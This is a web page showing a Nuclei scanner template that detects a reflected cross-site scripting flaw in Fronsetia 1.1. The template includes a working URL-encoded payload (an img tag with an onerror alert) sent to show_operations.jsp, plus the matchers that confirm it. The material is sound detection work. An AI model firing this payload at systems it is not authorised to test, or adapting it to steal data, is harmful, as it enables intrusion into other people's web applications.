Skip to content

Fronsetiav1.1 - Cross-Site Scripting

ID: fronsetiav-xss

Severity: high

Author: s4e-io

Tags: xss,fronsetia

The fronsetiav1.1 application is vulnerable to a Reflected XSS attack through the show_operations.jsp endpoint. An attacker can inject malicious scripts via the WSDL Location input, which is executed in the victim’s browser due to improper input sanitization. This allows attackers to execute arbitrary JavaScript, potentially stealing sensitive data or performing phishing attacks..

id: fronsetiav-xss
info:
name: Fronsetiav1.1 - Cross-Site Scripting
author: s4e-io
severity: high
description: |
The fronsetiav1.1 application is vulnerable to a Reflected XSS attack through the show_operations.jsp endpoint. An attacker can inject malicious scripts via the WSDL Location input, which is executed in the victim's browser due to improper input sanitization. This allows attackers to execute arbitrary JavaScript, potentially stealing sensitive data or performing phishing attacks..
reference:
- https://seclists.org/fulldisclosure/2024/Nov/10
- https://packetstormsecurity.com/files/182764/fronsetia-1.1-Cross-Site-Scripting.html
- https://msecureltd.blogspot.com/2024/11/friday-fun-pentest-series-14-reflected.html
metadata:
max-request: 1
vendor: fronsetiav1.1
product: fronsetiav1.1
tags: xss,fronsetia
http:
- method: GET
path:
- "{{BaseURL}}/show_operations.jsp?Fronsetia_WSDL=%22%3E%3Cimg%2Bsrc%3Dx%20onerror%3Dalert(document.domain)%3E"
matchers:
- type: dsl
dsl:
- 'contains(body, "\"><img src=x onerror=alert(document.domain)> </title>")'
- 'contains(content_type, "text/html")'
- 'status_code == 200'
condition: and
# digest: 4a0a004730450220706a99394bc559771217d1a31a6dd5ca98bdd39a4a11238acb5e56c9d5022ab40221008326caf76af4402971a39c0a0f748dda654a790bec534532b242ec12bf1c3de4:922c64590222798bb761d5b6d8e72950

This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.

Terminal window
$ nuclei -u "URL" -t "http/vulnerabilities/fronsetiav-xss.yaml"

View on Github